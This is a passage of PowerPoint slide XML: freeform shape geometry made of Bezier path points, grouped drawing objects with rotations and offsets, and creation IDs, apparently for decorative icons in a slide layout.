                      <a:pt x="313" y="129"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="313" y="114"/>
                      <a:pt x="300" y="109"/>
                      <a:pt x="288" y="109"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="269" y="109"/>
                      <a:pt x="264" y="120"/>
                      <a:pt x="264" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="264" y="120"/>
                      <a:pt x="264" y="120"/>
                      <a:pt x="264" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="264" y="38"/>
                      <a:pt x="264" y="38"/>
                      <a:pt x="264" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="272" y="40"/>
                      <a:pt x="279" y="43"/>
                      <a:pt x="287" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="291" y="48"/>
                      <a:pt x="295" y="46"/>
                      <a:pt x="296" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="298" y="39"/>
                      <a:pt x="296" y="35"/>
                      <a:pt x="292" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="214" y="0"/>
                      <a:pt x="140" y="2"/>
                      <a:pt x="92" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="18"/>
                      <a:pt x="7" y="33"/>
                      <a:pt x="5" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="36"/>
                      <a:pt x="0" y="40"/>
                      <a:pt x="2" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="47"/>
                      <a:pt x="8" y="48"/>
                      <a:pt x="11" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="46"/>
                      <a:pt x="19" y="43"/>
                      <a:pt x="32" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="64"/>
                      <a:pt x="32" y="64"/>
                      <a:pt x="32" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="65"/>
                      <a:pt x="26" y="69"/>
                      <a:pt x="22" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="72"/>
                      <a:pt x="12" y="73"/>
                      <a:pt x="12" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="85"/>
                      <a:pt x="20" y="85"/>
                      <a:pt x="26" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="85"/>
                      <a:pt x="25" y="124"/>
                      <a:pt x="20" y="164"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="195"/>
                      <a:pt x="15" y="195"/>
                      <a:pt x="15" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="195"/>
                      <a:pt x="39" y="195"/>
                      <a:pt x="39" y="19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8" y="165"/>
                      <a:pt x="46" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="165"/>
                      <a:pt x="52" y="173"/>
                      <a:pt x="52" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="195"/>
                      <a:pt x="52" y="195"/>
                      <a:pt x="52" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="195"/>
                      <a:pt x="79" y="195"/>
                      <a:pt x="79" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="195"/>
                      <a:pt x="81" y="167"/>
                      <a:pt x="71" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="133"/>
                      <a:pt x="44" y="125"/>
                      <a:pt x="43" y="104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43" y="78"/>
                      <a:pt x="52" y="80"/>
                      <a:pt x="55" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="70"/>
                      <a:pt x="49" y="63"/>
                      <a:pt x="42" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="67"/>
                      <a:pt x="40" y="65"/>
                      <a:pt x="38" y="64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52" y="32"/>
                      <a:pt x="71" y="27"/>
                      <a:pt x="95" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="112" y="21"/>
                      <a:pt x="132" y="19"/>
                      <a:pt x="154" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="154" y="170"/>
                      <a:pt x="154" y="170"/>
                      <a:pt x="154" y="170"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="153" y="170"/>
                      <a:pt x="153" y="170"/>
                      <a:pt x="153" y="170"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="125" y="170"/>
                      <a:pt x="114" y="186"/>
                      <a:pt x="114" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="212"/>
                      <a:pt x="112" y="238"/>
                      <a:pt x="112" y="238"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="235"/>
                      <a:pt x="119" y="235"/>
                      <a:pt x="119" y="235"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="235"/>
                      <a:pt x="114" y="226"/>
                      <a:pt x="116" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="206"/>
                      <a:pt x="123" y="207"/>
                      <a:pt x="123" y="207"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="129" y="206"/>
                      <a:pt x="128" y="216"/>
                      <a:pt x="128" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="243"/>
                      <a:pt x="128" y="243"/>
                      <a:pt x="128" y="243"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="243"/>
                      <a:pt x="155" y="243"/>
                      <a:pt x="155" y="243"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="243"/>
                      <a:pt x="154" y="231"/>
                      <a:pt x="163" y="231"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="231"/>
                      <a:pt x="172" y="229"/>
                      <a:pt x="172" y="243"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="198" y="242"/>
                      <a:pt x="198" y="242"/>
                      <a:pt x="198" y="242"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="198" y="242"/>
                      <a:pt x="198" y="224"/>
                      <a:pt x="198" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="198" y="206"/>
                      <a:pt x="196" y="198"/>
                      <a:pt x="196" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="190" y="177"/>
                      <a:pt x="170" y="172"/>
                      <a:pt x="159" y="170"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="19"/>
                      <a:pt x="159" y="19"/>
                      <a:pt x="159" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="189" y="20"/>
                      <a:pt x="223" y="24"/>
                      <a:pt x="259" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="259" y="120"/>
                      <a:pt x="259" y="120"/>
                      <a:pt x="259" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="236" y="120"/>
                      <a:pt x="236" y="120"/>
                      <a:pt x="236" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="236" y="120"/>
                      <a:pt x="214" y="120"/>
                      <a:pt x="214" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="214" y="174"/>
                      <a:pt x="214" y="174"/>
                      <a:pt x="214" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="244" y="174"/>
                      <a:pt x="244" y="174"/>
                      <a:pt x="244" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="244" y="174"/>
                      <a:pt x="241" y="169"/>
                      <a:pt x="241" y="164"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="241" y="161"/>
                      <a:pt x="242" y="159"/>
                      <a:pt x="246" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="263" y="159"/>
                      <a:pt x="263" y="159"/>
                      <a:pt x="263" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="263" y="174"/>
                      <a:pt x="263" y="174"/>
                      <a:pt x="263" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="297" y="174"/>
                      <a:pt x="297" y="174"/>
                      <a:pt x="297" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="297" y="174"/>
                      <a:pt x="289" y="163"/>
                      <a:pt x="289" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="299" y="151"/>
                      <a:pt x="313" y="147"/>
                      <a:pt x="313" y="129"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="30" y="73"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="71"/>
                      <a:pt x="31" y="71"/>
                      <a:pt x="32" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="70"/>
                      <a:pt x="32" y="70"/>
                      <a:pt x="32" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="70"/>
                      <a:pt x="35" y="71"/>
                      <a:pt x="35" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="74"/>
                      <a:pt x="34" y="75"/>
                      <a:pt x="32" y="75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31" y="74"/>
                      <a:pt x="30" y="74"/>
                      <a:pt x="30" y="73"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="124" y="194"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="194"/>
                      <a:pt x="122" y="193"/>
                      <a:pt x="122" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="191"/>
                      <a:pt x="123" y="190"/>
                      <a:pt x="124" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="190"/>
                      <a:pt x="127" y="191"/>
                      <a:pt x="127" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="193"/>
                      <a:pt x="126" y="194"/>
                      <a:pt x="124" y="194"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="281" y="129"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="280" y="129"/>
                      <a:pt x="279" y="128"/>
                      <a:pt x="279" y="126"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="279" y="125"/>
                      <a:pt x="280" y="124"/>
                      <a:pt x="281" y="124"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="283" y="124"/>
                      <a:pt x="284" y="125"/>
                      <a:pt x="284" y="126"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="284" y="128"/>
                      <a:pt x="283" y="129"/>
                      <a:pt x="281" y="129"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="296" y="129"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="295" y="129"/>
                      <a:pt x="294" y="128"/>
                      <a:pt x="294" y="126"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="294" y="125"/>
                      <a:pt x="295" y="124"/>
                      <a:pt x="296" y="124"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="297" y="124"/>
                      <a:pt x="298" y="125"/>
                      <a:pt x="298" y="126"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="298" y="128"/>
                      <a:pt x="297" y="129"/>
                      <a:pt x="296" y="1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82EE025C-46D4-4B94-94FA-84D3C88AE3F7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="670385">
              <a:off x="7868779" y="4732314"/>
              <a:ext cx="282094" cy="805573"/>
              <a:chOff x="9469654" y="2159644"/>
              <a:chExt cx="752475" cy="2148831"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="162" name="Freeform 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05199C98-D813-4E48-B469-5162042B1B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5DCE4669-A167-4991-B1C1-A90AC6FCDB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4" name="任意多边形 160">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F65EDC2B-41E9-4E08-B55F-641530B129D5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id="{6E2BCC89-F72D-4BFE-9E9E-5E41FDA32318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18344534">
              <a:off x="7427848" y="4018982"/>
              <a:ext cx="352657" cy="659317"/>
              <a:chOff x="2490" y="1429"/>
              <a:chExt cx="782" cy="1462"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="160" name="Freeform 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2FCEF91-E518-48B2-A010-13B5D2EFBC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1" name="Freeform 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E05A276-65BB-4B87-A71C-AE0474864D7D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DFDD6494-D27E-4B94-88F1-4BA44013286B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="1588421">
              <a:off x="2012300" y="3787880"/>
              <a:ext cx="1240338" cy="634328"/>
              <a:chOff x="10078074" y="1730681"/>
              <a:chExt cx="695325" cy="355600"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="158" name="Oval 53">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A971CE7-0850-4DC5-A0B2-A1B3E3177AA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078074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9" name="Freeform 54">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8F13B12-BE38-4428-B58D-5E87844E9D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7" name="Group 57">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{897BAF79-C007-4CAB-92B1-1BEAAAAAFA00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771236" y="688287"/>
              <a:ext cx="674688" cy="869950"/>
              <a:chOff x="2671" y="1887"/>
              <a:chExt cx="425" cy="548"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="153" name="Freeform 58">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6513B298-958F-438C-81FC-3519279D5E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96" y="240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4" name="Freeform 59">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1245DBD6-E129-4DBD-94F8-7348827D26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964" y="240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Freeform 60">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40E4A41E-6513-45A0-AD37-383C269787B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671" y="1887"/>
                <a:ext cx="425" cy="548"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 155 w 177"/>
                  <a:gd name="T1" fmla="*/ 195 h 229"/>
                  <a:gd name="T2" fmla="*/ 174 w 177"/>
                  <a:gd name="T3" fmla="*/ 169 h 229"/>
                  <a:gd name="T4" fmla="*/ 173 w 177"/>
                  <a:gd name="T5" fmla="*/ 147 h 229"/>
                  <a:gd name="T6" fmla="*/ 160 w 177"/>
                  <a:gd name="T7" fmla="*/ 121 h 229"/>
                  <a:gd name="T8" fmla="*/ 147 w 177"/>
                  <a:gd name="T9" fmla="*/ 91 h 229"/>
                  <a:gd name="T10" fmla="*/ 22 w 177"/>
                  <a:gd name="T11" fmla="*/ 65 h 229"/>
                  <a:gd name="T12" fmla="*/ 12 w 177"/>
                  <a:gd name="T13" fmla="*/ 110 h 229"/>
                  <a:gd name="T14" fmla="*/ 16 w 177"/>
                  <a:gd name="T15" fmla="*/ 122 h 229"/>
                  <a:gd name="T16" fmla="*/ 0 w 177"/>
                  <a:gd name="T17" fmla="*/ 169 h 229"/>
                  <a:gd name="T18" fmla="*/ 15 w 177"/>
                  <a:gd name="T19" fmla="*/ 193 h 229"/>
                  <a:gd name="T20" fmla="*/ 20 w 177"/>
                  <a:gd name="T21" fmla="*/ 195 h 229"/>
                  <a:gd name="T22" fmla="*/ 52 w 177"/>
                  <a:gd name="T23" fmla="*/ 215 h 229"/>
                  <a:gd name="T24" fmla="*/ 55 w 177"/>
                  <a:gd name="T25" fmla="*/ 219 h 229"/>
                  <a:gd name="T26" fmla="*/ 87 w 177"/>
                  <a:gd name="T27" fmla="*/ 220 h 229"/>
                  <a:gd name="T28" fmla="*/ 120 w 177"/>
                  <a:gd name="T29" fmla="*/ 219 h 229"/>
                  <a:gd name="T30" fmla="*/ 123 w 177"/>
                  <a:gd name="T31" fmla="*/ 215 h 229"/>
                  <a:gd name="T32" fmla="*/ 148 w 177"/>
                  <a:gd name="T33" fmla="*/ 215 h 229"/>
                  <a:gd name="T34" fmla="*/ 168 w 177"/>
                  <a:gd name="T35" fmla="*/ 174 h 229"/>
                  <a:gd name="T36" fmla="*/ 158 w 177"/>
                  <a:gd name="T37" fmla="*/ 161 h 229"/>
                  <a:gd name="T38" fmla="*/ 167 w 177"/>
                  <a:gd name="T39" fmla="*/ 141 h 229"/>
                  <a:gd name="T40" fmla="*/ 151 w 177"/>
                  <a:gd name="T41" fmla="*/ 128 h 229"/>
                  <a:gd name="T42" fmla="*/ 155 w 177"/>
                  <a:gd name="T43" fmla="*/ 107 h 229"/>
                  <a:gd name="T44" fmla="*/ 140 w 177"/>
                  <a:gd name="T45" fmla="*/ 103 h 229"/>
                  <a:gd name="T46" fmla="*/ 87 w 177"/>
                  <a:gd name="T47" fmla="*/ 6 h 229"/>
                  <a:gd name="T48" fmla="*/ 29 w 177"/>
                  <a:gd name="T49" fmla="*/ 65 h 229"/>
                  <a:gd name="T50" fmla="*/ 31 w 177"/>
                  <a:gd name="T51" fmla="*/ 98 h 229"/>
                  <a:gd name="T52" fmla="*/ 21 w 177"/>
                  <a:gd name="T53" fmla="*/ 117 h 229"/>
                  <a:gd name="T54" fmla="*/ 9 w 177"/>
                  <a:gd name="T55" fmla="*/ 138 h 229"/>
                  <a:gd name="T56" fmla="*/ 18 w 177"/>
                  <a:gd name="T57" fmla="*/ 150 h 229"/>
                  <a:gd name="T58" fmla="*/ 17 w 177"/>
                  <a:gd name="T59" fmla="*/ 186 h 229"/>
                  <a:gd name="T60" fmla="*/ 7 w 177"/>
                  <a:gd name="T61" fmla="*/ 171 h 229"/>
                  <a:gd name="T62" fmla="*/ 17 w 177"/>
                  <a:gd name="T63" fmla="*/ 186 h 229"/>
                  <a:gd name="T64" fmla="*/ 27 w 177"/>
                  <a:gd name="T65" fmla="*/ 197 h 229"/>
                  <a:gd name="T66" fmla="*/ 36 w 177"/>
                  <a:gd name="T67" fmla="*/ 212 h 229"/>
                  <a:gd name="T68" fmla="*/ 61 w 177"/>
                  <a:gd name="T69" fmla="*/ 215 h 229"/>
                  <a:gd name="T70" fmla="*/ 84 w 177"/>
                  <a:gd name="T71" fmla="*/ 212 h 229"/>
                  <a:gd name="T72" fmla="*/ 106 w 177"/>
                  <a:gd name="T73" fmla="*/ 221 h 229"/>
                  <a:gd name="T74" fmla="*/ 91 w 177"/>
                  <a:gd name="T75" fmla="*/ 211 h 229"/>
                  <a:gd name="T76" fmla="*/ 114 w 177"/>
                  <a:gd name="T77" fmla="*/ 215 h 229"/>
                  <a:gd name="T78" fmla="*/ 25 w 177"/>
                  <a:gd name="T79" fmla="*/ 152 h 229"/>
                  <a:gd name="T80" fmla="*/ 40 w 177"/>
                  <a:gd name="T81" fmla="*/ 109 h 229"/>
                  <a:gd name="T82" fmla="*/ 150 w 177"/>
                  <a:gd name="T83" fmla="*/ 151 h 229"/>
                  <a:gd name="T84" fmla="*/ 144 w 177"/>
                  <a:gd name="T85" fmla="*/ 185 h 229"/>
                  <a:gd name="T86" fmla="*/ 139 w 177"/>
                  <a:gd name="T87" fmla="*/ 212 h 229"/>
                  <a:gd name="T88" fmla="*/ 146 w 177"/>
                  <a:gd name="T89" fmla="*/ 192 h 229"/>
                  <a:gd name="T90" fmla="*/ 147 w 177"/>
                  <a:gd name="T91" fmla="*/ 207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77" h="229">
                    <a:moveTo>
                      <a:pt x="152" y="210"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="206"/>
                      <a:pt x="156" y="200"/>
                      <a:pt x="155" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="195"/>
                      <a:pt x="155" y="195"/>
                      <a:pt x="155" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="195"/>
                      <a:pt x="154" y="194"/>
                      <a:pt x="154" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="156" y="194"/>
                      <a:pt x="158" y="193"/>
                      <a:pt x="160" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="190"/>
                      <a:pt x="177" y="180"/>
                      <a:pt x="174" y="169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3" y="164"/>
                      <a:pt x="170" y="159"/>
                      <a:pt x="165" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="169" y="154"/>
                      <a:pt x="171" y="151"/>
                      <a:pt x="173" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="143"/>
                      <a:pt x="174" y="140"/>
                      <a:pt x="173" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="171" y="129"/>
                      <a:pt x="166" y="124"/>
                      <a:pt x="159" y="122"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="121"/>
                      <a:pt x="159" y="121"/>
                      <a:pt x="160" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="161" y="117"/>
                      <a:pt x="162" y="114"/>
                      <a:pt x="162" y="110"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="162" y="109"/>
                      <a:pt x="162" y="107"/>
                      <a:pt x="162" y="106"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="98"/>
                      <a:pt x="154" y="93"/>
                      <a:pt x="147" y="91"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="83"/>
                      <a:pt x="153" y="74"/>
                      <a:pt x="153" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="153" y="29"/>
                      <a:pt x="123" y="0"/>
                      <a:pt x="87" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="0"/>
                      <a:pt x="22" y="29"/>
                      <a:pt x="22" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="74"/>
                      <a:pt x="24" y="83"/>
                      <a:pt x="28" y="91"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="93"/>
                      <a:pt x="15" y="98"/>
                      <a:pt x="13" y="106"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="107"/>
                      <a:pt x="12" y="109"/>
                      <a:pt x="12" y="110"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="112"/>
                      <a:pt x="13" y="114"/>
                      <a:pt x="13" y="116"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="118"/>
                      <a:pt x="14" y="119"/>
                      <a:pt x="15" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="121"/>
                      <a:pt x="16" y="121"/>
                      <a:pt x="16" y="122"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="124"/>
                      <a:pt x="4" y="129"/>
                      <a:pt x="2" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="144"/>
                      <a:pt x="3" y="152"/>
                      <a:pt x="10" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="159"/>
                      <a:pt x="2" y="164"/>
                      <a:pt x="0" y="169"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="171"/>
                      <a:pt x="0" y="172"/>
                      <a:pt x="0" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="177"/>
                      <a:pt x="1" y="181"/>
                      <a:pt x="3" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="189"/>
                      <a:pt x="10" y="192"/>
                      <a:pt x="15" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="193"/>
                      <a:pt x="19" y="194"/>
                      <a:pt x="21" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="194"/>
                      <a:pt x="20" y="195"/>
                      <a:pt x="20" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="195"/>
                      <a:pt x="20" y="195"/>
                      <a:pt x="20" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="203"/>
                      <a:pt x="21" y="210"/>
                      <a:pt x="26" y="215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="217"/>
                      <a:pt x="31" y="218"/>
                      <a:pt x="35" y="219"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="221"/>
                      <a:pt x="47" y="219"/>
                      <a:pt x="52" y="215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="215"/>
                      <a:pt x="52" y="214"/>
                      <a:pt x="53" y="214"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="214"/>
                      <a:pt x="53" y="215"/>
                      <a:pt x="53" y="215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="216"/>
                      <a:pt x="54" y="217"/>
                      <a:pt x="55" y="219"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="223"/>
                      <a:pt x="62" y="226"/>
                      <a:pt x="67" y="228"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="229"/>
                      <a:pt x="77" y="228"/>
                      <a:pt x="82" y="225"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="224"/>
                      <a:pt x="86" y="222"/>
                      <a:pt x="87" y="220"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="222"/>
                      <a:pt x="91" y="224"/>
                      <a:pt x="93" y="225"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="228"/>
                      <a:pt x="103" y="229"/>
                      <a:pt x="108" y="228"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113" y="226"/>
                      <a:pt x="117" y="223"/>
                      <a:pt x="120" y="219"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="217"/>
                      <a:pt x="121" y="216"/>
                      <a:pt x="122" y="215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="215"/>
